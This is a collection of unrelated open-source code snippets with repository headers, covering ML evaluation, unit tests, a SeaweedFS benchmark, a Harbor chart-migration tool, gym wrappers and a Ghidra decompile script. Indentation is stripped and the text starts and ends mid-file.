logging.debug('R2 avg '+str(r2))
# Batch prediction
if X_test[1].shape == Y_test[1].shape:
score = model.evaluate(X_test, Y_test, verbose=0)
logging.debug(score)
logging.debug(model.metrics_names)
print(score)
trained_model["loss_score"] = score[0]
trained_model["mse"] = score[1]
if params["dataset"]["evaluation"] not in ['binary','multiclass','multilabel']:
trained_model["r2"] = r2
fw=open(common.DATA_DIR+'/results/train_results.txt','a')
fw.write(trained_model["model_id"]+'\n')
if params["training"]["loss_func"] == 'binary_crossentropy':
fw.write('ROC-AUC: '+str(roc_auc)+'\n')
print('ROC-AUC: '+str(roc_auc))
fw.write('Loss: '+str(score[0])+' ('+config.training_params["loss_func"]+')\n')
fw.write('MSE: '+str(score[1])+'\n')
elif params["dataset"]["evaluation"] not in ['binary','multiclass','multilabel']:
fw.write('R2 avg: '+str(r2)+'\n')
print('R2 avg: '+str(r2))
fw.write('Loss: '+str(score[0])+' ('+config.training_params["loss_func"]+')\n')
fw.write('MSE: '+str(score[1])+'\n')
fw.write(json.dumps(epochs.history)+"\n\n")
fw.close()
if with_predict:
trained_models = pd.read_csv(common.DEFAULT_TRAINED_MODELS_FILE, sep='\t')
model_config = trained_models[trained_models["model_id"] == trained_model["model_id"]]
model_config = model_config.to_dict(orient="list")
testset = open(common.DATASETS_DIR+'/items_index_test_%s.tsv' % (config.dataset_settings["dataset"])).read().splitlines()
if config.training_params["val_from_file"] and not only_metadata:
predictions, predictions_index = obtain_predictions(model_config, testset, trained_model["model_id"], config.predicting_params["trim_coeff"], model=model, with_metadata=with_metadata, only_metadata=only_metadata, metadata_source=metadata_source, with_patches=True)
else:
predictions, predictions_index = obtain_predictions(model_config, testset, trained_model["model_id"], config.predicting_params["trim_coeff"], model=model, with_metadata=with_metadata, only_metadata=only_metadata, metadata_source=metadata_source)
print("Predictions created")
if with_eval:
do_eval(trained_model["model_id"],get_roc=True,get_map=True,get_p=True,predictions=predictions,predictions_index=predictions_index)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='Evaluates the model',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-p',
'--params',
dest="params_file",
help='JSON file with params',
default=False)
parser.add_argument('-pred',
'--predict',
dest="with_predict",
help='Predict factors',
action='store_true',
default=False)
parser.add_argument('-eval',
'--eval',
dest="with_eval",
help='Eval factors',
action='store_true',
default=False)
parser.add_argument('-m',
'--metadata',
dest="with_metadata",
help='Use metadata',
action='store_true',
default=False)
parser.add_argument('-om',
'--only_metadata',
dest="only_metadata",
help='Use only metadata',
action='store_true',
default=False)
parser.add_argument('-ms',
'--metadata_source',
dest="metadata_source",
type=str,
help='Suffix of metadata files',
default="rovi")
args = parser.parse_args()
params = models.params_1
if args.params_file:
params = json.load(open(args.params_file))
process(params)
|
torba/torba/client/errors.py
|
mittalkartik2000/lbry-sdk
| 4,076 |
62699
|
<reponame>mittalkartik2000/lbry-sdk
class InsufficientFundsError(Exception):
pass
|
kafka_influxdb/tests/encoder_test/test_heapster_json_encoder.py
|
gldnspud/kafka-influxdb
| 224 |
62715
|
import unittest
from kafka_influxdb.encoder import heapster_json_encoder
class TestHeapsterJsonEncoder(unittest.TestCase):
def setUp(self):
self.encoder = heapster_json_encoder.Encoder()
def testEncoder(self):
msg = b'{ "MetricsName":"memory/major_page_faults","MetricsValue":{"value":56}, "MetricsTimestamp":"2017-01-19T17:26:00Z", "MetricsTags":{"container_name":"docker/9be430d3a1a28601292aebd76e15512d5471c630a7fa164d6a2a2fd9cbc19e3d"} } '
encoded_message = self.encoder.encode(msg)
expected_msg = [
'memory/major_page_faults,container_name=docker/9be430d3a1a28601292aebd76e15512d5471c630a7fa164d6a2a2fd9cbc19e3d value=56 1484846760']
self.assertEqual(encoded_message, expected_msg)
|
hail/python/cluster-tests/cluster-write-many-partitions.py
|
tdeboer-ilmn/hail
| 789 |
62717
|
<gh_stars>100-1000
import hail as hl
ht = hl.utils.range_table(1_000_000, n_partitions=10_000)
# use HDFS so as not to create garbage on GS
ht.write('/tmp/many_partitions.ht')
mt = hl.utils.range_matrix_table(1_000_000, 2, n_partitions=10_000)
mt.write('/tmp/many_partitions.mt')
|
src/dev/steve/Escape_T6/logs/statsDistances.py
|
wvat/NTRTsim
| 148 |
62721
|
""" Prints the min, avg, max of the numbers on each line """
import sys
try:
f = open(sys.argv[1], 'r')
lines = 0
sum = 0
max = 0
min = 9999999
for line in f:
lines += 1
x = float(line.partition(',')[0])
sum += x
if x < min:
min = x
if x > max:
max = x
print "min: " + str(min)
print "avg: " + str((sum / lines))
print "max: " + str(max)
finally:
f.close()
|
tests/unit/test_results.py
|
diadochos/elfi
| 166 |
62722
|
<gh_stars>100-1000
import numpy as np
import pytest
import elfi
def test_sample():
n_samples = 10
parameter_names = ['a', 'b']
distance_name = 'dist'
samples = [
np.random.random(n_samples),
np.random.random(n_samples),
np.random.random(n_samples)
]
outputs = dict(zip(parameter_names + [distance_name], samples))
sample = elfi.methods.results.Sample(
method_name="TestRes",
outputs=outputs,
parameter_names=parameter_names,
discrepancy_name=distance_name,
something='x',
something_else='y',
n_sim=0, )
assert sample.method_name == "TestRes"
assert hasattr(sample, 'samples')
assert sample.n_samples == n_samples
assert sample.dim == len(parameter_names)
assert not sample.is_multivariate
assert np.allclose(samples[0], sample.samples_array[:, 0])
assert np.allclose(samples[1], sample.samples_array[:, 1])
assert np.allclose(samples[-1], sample.discrepancies)
assert hasattr(sample, 'something')
assert sample.something_else == 'y'
with pytest.raises(AttributeError):
sample.not_here
# Test summary
sample.summary()
def test_bolfi_sample():
n_chains = 3
n_iters = 10
warmup = 5
parameter_names = ['a', 'b']
chains = np.random.random((n_chains, n_iters, len(parameter_names)))
result = elfi.methods.results.BolfiSample(
method_name="TestRes",
chains=chains,
parameter_names=parameter_names,
warmup=warmup,
something='x',
something_else='y',
n_sim=0, )
assert result.method_name == "TestRes"
assert hasattr(result, 'samples')
assert hasattr(result, 'chains')
assert hasattr(result, 'outputs')
assert result.n_samples == n_chains * (n_iters - warmup)
assert result.dim == len(parameter_names)
assert not result.is_multivariate
# verify that chains are merged correctly
s0 = np.concatenate([chains[i, warmup:, 0] for i in range(n_chains)])
s1 = np.concatenate([chains[i, warmup:, 1] for i in range(n_chains)])
assert np.allclose(s0, result.samples[parameter_names[0]])
assert np.allclose(s1, result.samples[parameter_names[1]])
assert hasattr(result, 'something')
assert result.something_else == 'y'
@pytest.mark.parametrize('multivariate_model', [3], indirect=True)
def test_multivariate(multivariate_model):
n_samples = 10
rej = elfi.Rejection(multivariate_model['d'], batch_size=5)
sample = rej.sample(n_samples)
assert sample.outputs['t1'].shape == (n_samples, 3)
assert sample.outputs['d'].shape == (n_samples,)
assert sample.is_multivariate
|
Anaconda-files/Program_03a.py
|
arvidl/dynamical-systems-with-applications-using-python
| 106 |
62800
|
<filename>Anaconda-files/Program_03a.py
# Program 03a: Phase portrait of a linear system.
# See Figure 3.8(a).
import matplotlib.pyplot as plt
import numpy as np
from scipy.integrate import odeint
import pylab as pl
# The 2-dimensional linear system
a, b, c, d = 2, 1, 1, 2
def dx_dt(x, t):
return [a*x[0] + b*x[1], c*x[0] + d*x[1]]
# Trajectories in forward time
ts = np.linspace(0, 4, 100)
ic = np.linspace(-1, 1, 5)
for r in ic:
for s in ic:
x0 = [r, s]
xs = odeint(dx_dt, x0, ts)
plt.plot(xs[:, 0], xs[:, 1], 'r-')
# Trajectories in backward time
ts = np.linspace(0, -4, 100)
ic = np.linspace(-1, 1, 5)
for r in ic:
for s in ic:
x0 = [r, s]
xs = odeint(dx_dt, x0, ts)
plt.plot(xs[:, 0], xs[:, 1], 'r-')
# Label the axes and set fontsizes
plt.xlabel('x', fontsize=15)
plt.ylabel('y', fontsize=15)
plt.tick_params(labelsize=15)
plt.xlim(-1, 1)
plt.ylim(-1, 1)
# Plot the vectorfield. See lines 10, 12 for system.
X, Y = np.mgrid[-1:1:10j, -1:1:10j]
u = a*X + b*Y
v = c*X + d*Y
pl.quiver(X, Y, u, v, color='b')
plt.show()
|
zerver/tests/test_thumbnail.py
|
Pulkit007/zulip
| 17,004 |
62815
|
<gh_stars>1000+
from io import StringIO
import orjson
from zerver.lib.test_classes import ZulipTestCase
class ThumbnailTest(ZulipTestCase):
def test_thumbnail_redirect(self) -> None:
self.login("hamlet")
fp = StringIO("zulip!")
fp.name = "zulip.jpeg"
result = self.client_post("/json/user_uploads", {"file": fp})
self.assert_json_success(result)
json = orjson.loads(result.content)
self.assertIn("uri", json)
uri = json["uri"]
base = "/user_uploads/"
self.assertEqual(base, uri[: len(base)])
result = self.client_get("/thumbnail", {"url": uri[1:], "size": "full"})
self.assertEqual(result.status_code, 302, result)
self.assertEqual(uri, result.url)
self.login("iago")
result = self.client_get("/thumbnail", {"url": uri[1:], "size": "full"})
self.assertEqual(result.status_code, 403, result)
self.assert_in_response("You are not authorized to view this file.", result)
uri = "https://www.google.com/images/srpr/logo4w.png"
result = self.client_get("/thumbnail", {"url": uri, "size": "full"})
self.assertEqual(result.status_code, 302, result)
base = "https://external-content.zulipcdn.net/external_content/56c362a24201593891955ff526b3b412c0f9fcd2/68747470733a2f2f7777772e676f6f676c652e636f6d2f696d616765732f737270722f6c6f676f34772e706e67"
self.assertEqual(base, result.url)
uri = "http://www.google.com/images/srpr/logo4w.png"
result = self.client_get("/thumbnail", {"url": uri, "size": "full"})
self.assertEqual(result.status_code, 302, result)
base = "https://external-content.zulipcdn.net/external_content/7b6552b60c635e41e8f6daeb36d88afc4eabde79/687474703a2f2f7777772e676f6f676c652e636f6d2f696d616765732f737270722f6c6f676f34772e706e67"
self.assertEqual(base, result.url)
uri = "//www.google.com/images/srpr/logo4w.png"
result = self.client_get("/thumbnail", {"url": uri, "size": "full"})
self.assertEqual(result.status_code, 302, result)
base = "https://external-content.zulipcdn.net/external_content/676530cf4b101d56f56cc4a37c6ef4d4fd9b0c03/2f2f7777772e676f6f676c652e636f6d2f696d616765732f737270722f6c6f676f34772e706e67"
self.assertEqual(base, result.url)
|
specutils/tests/test_utils.py
|
havok2063/specutils
| 118 |
62823
|
import pickle
import pytest
import numpy as np
from astropy import units as u
from astropy import modeling
from specutils.utils import QuantityModel
from ..utils.wcs_utils import refraction_index, vac_to_air, air_to_vac
wavelengths = [300, 500, 1000] * u.nm
data_index_refraction = {
'Griesen2006': np.array([3.07393068, 2.9434858 , 2.8925797 ]),
'Edlen1953': np.array([2.91557413, 2.78963801, 2.74148172]),
'Edlen1966': np.array([2.91554272, 2.7895973 , 2.74156098]),
'PeckReeder1972': np.array([2.91554211, 2.78960005, 2.74152561]),
'Morton2000': np.array([2.91568573, 2.78973402, 2.74169531]),
'Ciddor1996': np.array([2.91568633, 2.78973811, 2.74166131])
}
def test_quantity_model():
c = modeling.models.Chebyshev1D(3)
uc = QuantityModel(c, u.AA, u.km)
assert uc(10*u.nm).to(u.m) == 0*u.m
def test_pickle_quantity_model(tmp_path):
"""
Check that a QuantityModel can roundtrip through pickling, as it
would if fit in a multiprocessing pool.
"""
c = modeling.models.Chebyshev1D(3)
uc = QuantityModel(c, u.AA, u.km)
pkl_file = tmp_path / "qmodel.pkl"
with open(pkl_file, "wb") as f:
pickle.dump(uc, f)
with open(pkl_file, "rb") as f:
new_model = pickle.load(f)
assert new_model.input_units == uc.input_units
assert new_model.return_units == uc.return_units
assert type(new_model.unitless_model) == type(uc.unitless_model)
assert np.all(new_model.unitless_model.parameters == uc.unitless_model.parameters)
@pytest.mark.parametrize("method", data_index_refraction.keys())
def test_refraction_index(method):
tmp = (refraction_index(wavelengths, method) - 1) * 1e4
assert np.isclose(tmp, data_index_refraction[method], atol=1e-7).all()
@pytest.mark.parametrize("method", data_index_refraction.keys())
def test_air_to_vac(method):
tmp = refraction_index(wavelengths, method)
assert np.isclose(wavelengths.value * tmp,
air_to_vac(wavelengths, method=method, scheme='inversion').value,
rtol=1e-6).all()
assert np.isclose(wavelengths.value,
air_to_vac(vac_to_air(wavelengths, method=method),
method=method, scheme='iteration').value,
atol=1e-12).all()
|
tools/bin/pythonSrc/pychecker-0.8.18/test_input/import37.py
|
YangHao666666/hawq
| 450 |
62846
|
'd'
class Test:
'doc'
def x(self):
import struct
print struct
|
unmaintain/benchmark/benchmark_seaweedfs.py
|
zuzhi/rssant
| 1,176 |
62985
|
import aiohttp
import asyncio
import os
import sys
import time
import random
import contextlib
seaweedfs_url = 'http://127.0.0.1:9081'
def random_content():
return os.urandom(random.randint(1, 10) * 1024)
def random_fid(volumes):
volume_id = random.choice(volumes)
file_key = random.randint(0, 1 << 24)
file_key_hex = '%x' % file_key
cookie_hex = '00000000'
return f'{volume_id},{file_key_hex}{cookie_hex}'
class Reporter:
def __init__(self):
self.items = []
@contextlib.contextmanager
def report(self):
t0 = time.monotonic()
yield
value = time.monotonic() - t0
self.items.append(value * 1000)
def summary(self, concurrency):
n = len(self.items)
s = sum(self.items)
avg = s / n if n > 0 else 0
s_items = list(sorted(self.items))
result = [f'avg={avg:.1f}']
p_s = [0.5, 0.8, 0.9, 0.95, 0.99]
if n > 0:
for p in p_s:
v = s_items[int(n * p)]
result.append('p{}={:.1f}'.format(int(p * 100), v))
qps = (1000 / avg) * concurrency
result.append(f'qps={qps:.0f}')
print(' '.join(result))
self.items = []
READER_REPORTER = Reporter()
WRITER_REPORTER = Reporter()
async def put(session, fid: str, content: bytes):
url = f'{seaweedfs_url}/{fid}'
data = aiohttp.FormData()
data.add_field(
'file',
content,
content_type='application/gzip'
)
async with session.put(url, data=data) as response:
result = await response.read()
return response.status, result
async def get(session, fid: str):
url = f'{seaweedfs_url}/{fid}'
async with session.get(url) as response:
result = await response.read()
return response.status, result
async def reader_task(session, fid_s, n):
fid_s = list(fid_s)
random.shuffle(fid_s)
for fid in fid_s:
with READER_REPORTER.report():
status, r = await get(session, fid)
assert status == 200, (status, r)
async def writer_task(session, fid_s, n):
fid_s = list(fid_s)
random.shuffle(fid_s)
for fid in fid_s:
content = random_content()
with WRITER_REPORTER.report():
status, r = await put(session, fid, content)
assert status in (200, 201, 204), (status, r)
async def benchmark(session, num_volume, num_fid, num_round, concurrency):
volumes = list(range(20, 20 + num_volume))
fid_s_s = []
for i in range(concurrency):
fid_s = [random_fid(volumes) for _ in range(num_fid // concurrency)]
fid_s_s.append(fid_s)
loop = asyncio.get_event_loop()
for n in range(num_round):
print(f'{n} ' + '-' * 60)
writer_tasks = []
for i in range(concurrency):
t = writer_task(session, fid_s_s[i], num_round)
writer_tasks.append(loop.create_task(t))
await asyncio.gather(*writer_tasks)
WRITER_REPORTER.summary(concurrency)
reader_tasks = []
for i in range(concurrency):
t = reader_task(session, fid_s_s[i], num_round)
reader_tasks.append(loop.create_task(t))
await asyncio.gather(*reader_tasks)
READER_REPORTER.summary(concurrency)
async def async_main(num_volume, concurrency):
print(f'num_volume={num_volume} concurrency={concurrency}')
async with aiohttp.ClientSession() as session:
await benchmark(
session,
num_fid=1000,
num_round=3,
num_volume=num_volume,
concurrency=concurrency,
)
def main():
num_volume = int(sys.argv[1])
concurrency = int(sys.argv[2])
loop = asyncio.get_event_loop()
loop.run_until_complete(async_main(num_volume, concurrency))
if __name__ == "__main__":
main()
|
tools/migrate_chart/migrate_chart.py
|
kschu91/harbor
| 12,706 |
63034
|
#!/usr/local/bin/python3
import subprocess
import signal
import sys
from pathlib import Path
import click
import requests
MIGRATE_CHART_SCRIPT = '/migrate_chart.sh'
HELM_CMD = '/linux-amd64/helm'
CA_UPDATE_CMD = 'update-ca-certificates'
CHART_URL_PATTERN = "https://{host}/api/v2.0/projects/{project}/repositories/{name}/artifacts/{version}"
CHART_SOURCE_DIR = Path('/chart_storage')
errs = []
def print_exist_errs():
if errs:
click.echo("Following errors exist", err=True)
for e in errs:
click.echo(e, err=True)
def graceful_exit(signum, frame):
print_exist_errs()
sys.exit()
signal.signal(signal.SIGINT, graceful_exit)
signal.signal(signal.SIGTERM, graceful_exit)
class ChartV2:
def __init__(self, filepath:Path):
self.filepath = filepath
self.project = self.filepath.parts[-2]
parts = self.filepath.stem.split('-')
flag = False
for i in range(len(parts)-1, -1, -1):
if parts[i][0].isnumeric():
self.name, self.version = '-'.join(parts[:i]), '-'.join(parts[i:])
flag = True
break
if not flag:
raise Exception('chart name: {} is illegal'.format('-'.join(parts)))
def __check_exist(self, hostname, username, password):
return requests.get(CHART_URL_PATTERN.format(
host=hostname,
project=self.project,
name=self.name,
version=self.version),
auth=requests.auth.HTTPBasicAuth(username, password))
def migrate(self, hostname, username, password):
res = self.__check_exist(hostname, username, password)
if res.status_code == 200:
raise Exception("Artifact already exist in harbor")
if res.status_code == 401:
raise Exception(res.reason)
oci_ref = "{host}/{project}/{name}:{version}".format(
host=hostname,
project=self.project,
name=self.name,
version=self.version)
return subprocess.run([MIGRATE_CHART_SCRIPT, HELM_CMD, self.filepath, oci_ref],
text=True, stdout=subprocess.DEVNULL, stderr=subprocess.PIPE)
@click.command()
@click.option('--hostname', default='127.0.0.1', help='the password to login harbor')
@click.option('--username', default='admin', help='The username to login harbor')
@click.option('--password', default='<PASSWORD>', help='the password to login harbor')
def migrate(hostname, username, password):
"""
Migrate chart v2 to harbor oci registry
"""
if username != 'admin':
raise Exception('This operation only allowed for admin')
subprocess.run([CA_UPDATE_CMD])
subprocess.run([HELM_CMD, 'registry', 'login', hostname, '--username', username, '--password', password])
charts = [ChartV2(c) for p in CHART_SOURCE_DIR.iterdir() if p.is_dir() for c in p.iterdir() if c.is_file() and c.name != "index-cache.yaml"]
with click.progressbar(charts, label="Migrating chart ...", length=len(charts),
item_show_func=lambda x: "{}/{}:{} total errors: {}".format(x.project, x.name, x.version, len(errs)) if x else '') as bar:
for chart in bar:
try:
result = chart.migrate(hostname, username, password)
if result.stderr:
errs.append("chart: {name}:{version} in {project} has err: {err}".format(
name=chart.name,
version=chart.version,
project=chart.project,
err=result.stderr
))
except Exception as e:
errs.append("chart: {name}:{version} in {project} has err: {err}".format(
name=chart.name,
version=chart.version,
project=chart.project,
err=e))
click.echo("Migration is Done.")
print_exist_errs()
if __name__ == '__main__':
migrate()
|
opal_common/authentication/types.py
|
NateKat/opal
| 367 |
63068
|
from enum import Enum
from typing import Dict, Any
from jwt.algorithms import get_default_algorithms
from cryptography.hazmat._types import (
_PRIVATE_KEY_TYPES,
_PUBLIC_KEY_TYPES,
)
# custom types
PrivateKey = _PRIVATE_KEY_TYPES
PublicKey = _PUBLIC_KEY_TYPES
JWTClaims = Dict[str, Any]
class EncryptionKeyFormat(str, Enum):
"""
represent the supported formats for storing encryption keys.
- PEM (https://en.wikipedia.org/wiki/Privacy-Enhanced_Mail)
- SSH (RFC4716) or short format (RFC4253, section-6.6, explained here: https://coolaj86.com/articles/the-ssh-public-key-format/)
- DER (https://en.wikipedia.org/wiki/X.690#DER_encoding)
"""
pem = 'pem'
ssh = 'ssh'
der = 'der'
# dynamic enum because pyjwt does not define one
# see: https://pyjwt.readthedocs.io/en/stable/algorithms.html for possible values
JWTAlgorithm = Enum('JWTAlgorithm', [(k,k) for k in get_default_algorithms().keys()])
|
bigchaindb/exceptions.py
|
AbhishaB/bigchaindb
| 474 |
63111
|
<filename>bigchaindb/exceptions.py
# Copyright BigchainDB GmbH and BigchainDB contributors
# SPDX-License-Identifier: (Apache-2.0 AND CC-BY-4.0)
# Code is Apache-2.0 and docs are CC-BY-4.0
class BigchainDBError(Exception):
"""Base class for BigchainDB exceptions."""
class CriticalDoubleSpend(BigchainDBError):
"""Data integrity error that requires attention"""
|
examples/med_sts_clinical.py
|
anwar1103/semantic-text-similarit
| 167 |
63230
|
<reponame>anwar1103/semantic-text-similarit<filename>examples/med_sts_clinical.py
from semantic_text_similarity.models import ClinicalBertSimilarity
from scipy.stats import pearsonr
model = ClinicalBertSimilarity()
predictions = model.predict([("The patient is sick.", "Grass is green."),
("A prescription of acetaminophen 325 mg was given."," The patient was given Tylenol.")])
print(predictions)
|
Chapter2/ex_2_36.py
|
zxjzxj9/PyTorchIntroduction
| 205 |
63240
|
<gh_stars>100-1000
""" 该代码仅为演示函数签名所用,并不能实际运行
"""
save_info = { # 保存的信息
"iter_num": iter_num, # 迭代步数
"optimizer": optimizer.state_dict(), # 优化器的状态字典
"model": model.state_dict(), # 模型的状态字典
}
# 保存信息
torch.save(save_info, save_path)
# 载入信息
save_info = torch.load(save_path)
optimizer.load_state_dict(save_info["optimizer"])
model.load_state_dict(sae_info["model"])
|
utils/wrappers.py
|
pacificlion/world_models
| 106 |
63252
|
<reponame>pacificlion/world_models
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Environment wrappers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gym
import numpy as np
from PIL import Image
from world_models.utils import nested
class ObservationDict(gym.Wrapper):
"""Changes the observation space to be a dict."""
def __init__(self, env, key='observ'):
self._key = key
self.env = env
def __getattr__(self, name):
return getattr(self.env, name)
@property
def observation_space(self):
spaces = {self._key: self.env.observation_space}
return gym.spaces.Dict(spaces)
@property
def action_space(self):
return self.env.action_space
def step(self, action):
obs, reward, done, info = self.env.step(action)
obs = {self._key: np.array(obs)}
return obs, reward, done, info
def reset(self):
obs = self.env.reset()
obs = {self._key: np.array(obs)}
return obs
class ActionRepeat(gym.Wrapper):
"""Repeats the same action `n` times and returns the last step results."""
def __init__(self, env, n):
super(ActionRepeat, self).__init__(env)
assert n >= 1
self._n = n
def __getattr__(self, name):
return getattr(self.env, name)
def step(self, action):
done = False
total_reward = 0
current_step = 0
while current_step < self._n and not done:
observ, reward, done, info = self.env.step(action)
total_reward += reward
current_step += 1
return observ, total_reward, done, info
class ActionNormalize(gym.Env):
"""Normalizes the action space."""
def __init__(self, env):
self._env = env
self._mask = np.logical_and(
np.isfinite(env.action_space.low), np.isfinite(env.action_space.high))
self._low = np.where(self._mask, env.action_space.low, -1)
self._high = np.where(self._mask, env.action_space.high, 1)
def __getattr__(self, name):
return getattr(self._env, name)
@property
def action_space(self):
low = np.where(self._mask, -np.ones_like(self._low), self._low)
high = np.where(self._mask, np.ones_like(self._low), self._high)
return gym.spaces.Box(low, high, dtype=np.float32)
def step(self, action):
original = (action + 1) / 2 * (self._high - self._low) + self._low
original = np.where(self._mask, original, action)
return self._env.step(original)
def reset(self):
return self._env.reset()
def render(self, mode='human'):
return self._env.render(mode=mode)
class MaximumDuration(gym.Wrapper):
"""Force sets `done` after the specified duration."""
def __init__(self, env, duration):
super(MaximumDuration, self).__init__(env)
self._duration = duration
self._step = None
def __getattr__(self, name):
return getattr(self.env, name)
def step(self, action):
if self._step is None:
raise RuntimeError('Must reset environment.')
observ, reward, done, info = self.env.step(action)
self._step += 1
if self._step >= self._duration:
done = True
self._step = None
return observ, reward, done, info
def reset(self):
self._step = 0
return self.env.reset()
class MinimumDuration(gym.Wrapper):
"""Force resets `done` before the specified duration."""
def __init__(self, env, duration):
super(MinimumDuration, self).__init__(env)
self._duration = duration
self._step = None
def __getattr__(self, name):
return getattr(self.env, name)
def step(self, action):
observ, reward, done, info = self.env.step(action)
self._step += 1
if self._step < self._duration:
done = False
return observ, reward, done, info
def reset(self):
self._step = 0
return self.env.reset()
class ConvertTo32Bit(gym.Wrapper):
"""Converts observation and rewards to int/float32."""
def __getattr__(self, name):
return getattr(self.env, name)
def step(self, action):
observ, reward, done, info = self.env.step(action)
observ = nested.map(self._convert_observ, observ)
reward = self._convert_reward(reward)
return observ, reward, done, info
def reset(self):
observ = self.env.reset()
observ = nested.map(self._convert_observ, observ)
return observ
def _convert_observ(self, observ):
if not np.isfinite(observ).all():
raise ValueError('Infinite observation encountered.')
if observ.dtype == np.float64:
return observ.astype(np.float32)
if observ.dtype == np.int64:
return observ.astype(np.int32)
return observ
def _convert_reward(self, reward):
if not np.isfinite(reward).all():
raise ValueError('Infinite reward encountered.')
return np.array(reward, dtype=np.float32)
class RenderObservation(gym.Env):
"""Changes the observation space to rendered frames."""
def __init__(self, env, size=(64, 64), dtype=np.uint8, key='image'):
assert isinstance(env.observation_space, gym.spaces.Dict)
self.env = env
self._size = size
self._dtype = dtype
self._key = key
def __getattr__(self, name):
return getattr(self.env, name)
@property
def observation_space(self):
high = {np.uint8: 255, np.float: 1.0}[self._dtype]
image = gym.spaces.Box(0, high, self._size + (3,), dtype=self._dtype)
spaces = self.env.observation_space.spaces.copy()
assert self._key not in spaces
spaces[self._key] = image
return gym.spaces.Dict(spaces)
@property
def action_space(self):
return self.env.action_space
def step(self, action):
obs, reward, done, info = self.env.step(action)
obs[self._key] = self._render_image()
return obs, reward, done, info
def reset(self):
obs = self.env.reset()
obs[self._key] = self._render_image()
return obs
def _render_image(self):
"""Renders the environment and processes the image."""
image = self.env.render('rgb_array')
if image.shape[:2] != self._size:
image = np.array(Image.fromarray(image).resize(self._size))
if self._dtype and image.dtype != self._dtype:
if image.dtype in (np.float32, np.float64) and self._dtype == np.uint8:
image = (image * 255).astype(self._dtype)
elif image.dtype == np.uint8 and self._dtype in (np.float32, np.float64):
image = image.astype(self._dtype) / 255
else:
message = 'Cannot convert observations from {} to {}.'
raise NotImplementedError(message.format(image.dtype, self._dtype))
return image
class DeepMindEnv(gym.Env):
"""Wrapper for deepmind MuJoCo environments to expose gym env methods."""
metadata = {'render.modes': ['rgb_array']}
reward_range = (-np.inf, np.inf)
def __init__(self, env, render_size=(64, 64), camera_id=0):
self._env = env
self._render_size = render_size
self._camera_id = camera_id
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
components = {}
for key, value in self._env.observation_spec().items():
components[key] = gym.spaces.Box(
-np.inf, np.inf, value.shape, dtype=np.float32)
return gym.spaces.Dict(components)
@property
def action_space(self):
action_spec = self._env.action_spec()
return gym.spaces.Box(
action_spec.minimum, action_spec.maximum, dtype=np.float32)
def step(self, action):
time_step = self._env.step(action)
obs = dict(time_step.observation)
reward = time_step.reward or 0
done = time_step.last()
info = {'discount': time_step.discount}
return obs, reward, done, info
def reset(self):
time_step = self._env.reset()
return dict(time_step.observation)
def render(self, *args, **kwargs):
if kwargs.get('mode', 'rgb_array') != 'rgb_array':
raise ValueError("Only render mode 'rgb_array' is supported.")
del args # Unused
del kwargs # Unused
return self._env.physics.render(
*self._render_size, camera_id=self._camera_id)
def get_state(self):
return (
np.array(self.physics.data.qpos),
np.array(self.physics.data.qvel),
np.array(self.physics.data.ctrl),
np.array(self.physics.data.act))
def set_state(self, state):
with self.physics.reset_context():
self.physics.data.qpos[:] = state[0]
self.physics.data.qvel[:] = state[1]
self.physics.data.ctrl[:] = state[2]
self.physics.data.act[:] = state[3]
|
pytorch_pfn_extras/distributed/__init__.py
|
belltailjp/pytorch-pfn-extras
| 243 |
63275
|
<gh_stars>100-1000
from pytorch_pfn_extras.distributed._dataset_util import create_distributed_subset_indices # NOQA
|
lightnet/__init__.py
|
rversaw/lightnet
| 345 |
63279
|
<reponame>rversaw/lightnet<gh_stars>100-1000
# coding: utf8
from __future__ import unicode_literals
from .lightnet import Network, Image, BoxLabels
from .about import __version__
def load(name, path=None):
return Network.load(name, path=path)
|
ghida_plugin/ghidra_plugin/FunctionDecompile.py
|
wumb0/GhIDA
| 675 |
63288
|
<filename>ghida_plugin/ghidra_plugin/FunctionDecompile.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
##############################################################################
# #
# FunctionDecompile - Ghidra plugin #
# #
# Copyright 2019 <NAME>, <NAME> #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
# #
##############################################################################
import json
import sys
try:
args = getScriptArgs()
response_dict = dict()
if len(args) < 2:
print("usage: ./FunctionDecompile.py function_address output_path")
sys.exit(0)
decompInterface = ghidra.app.decompiler.DecompInterface()
decompInterface.openProgram(currentProgram)
# function_address mush be in hex format, with an optional ending 'L'
address = int(args[0].rstrip("L"), 16)
# output_path of the json file (should terminate with ".json")
output_path = args[1]
found = False
response_dict['address'] = address
functionIterator = currentProgram.getFunctionManager().getFunctions(True)
for function in functionIterator:
if function.getEntryPoint().getOffset() == address:
decompileResults = decompInterface.decompileFunction(
function, 30, monitor)
if decompileResults.decompileCompleted():
decompiledFunction = decompileResults.getDecompiledFunction()
decompiled = decompiledFunction.getC()
response_dict['status'] = "completed"
response_dict['decompiled'] = decompiled
else:
response_dict['status'] = "error"
found = True
break
if not found:
response_dict['status'] = "error"
with open(output_path, "w") as f_out:
json.dump(response_dict, f_out)
print("Json saved to %s" % output_path)
except Exception:
response_dict['status'] = "error"
print(json.dumps(response_dict))
|
spyql/output_handler.py
|
alin23/spyql
| 432 |
63315
|
<reponame>alin23/spyql
from spyql.nulltype import Null
class OutputHandler:
"""Mediates data processing with data writting"""
@staticmethod
def make_handler(prs):
"""
Chooses the right handler depending on the kind of query
and eventual optimization opportunities
"""
if prs["group by"] and not prs["partials"]:
return GroupByDelayedOutSortAtEnd(
prs["order by"], prs["limit"], prs["offset"]
)
if prs["order by"]:
# TODO optimization: use special handler that only keeps the top n elements
# in memory when LIMIT is defined
if prs["distinct"]:
return DistinctDelayedOutSortAtEnd(
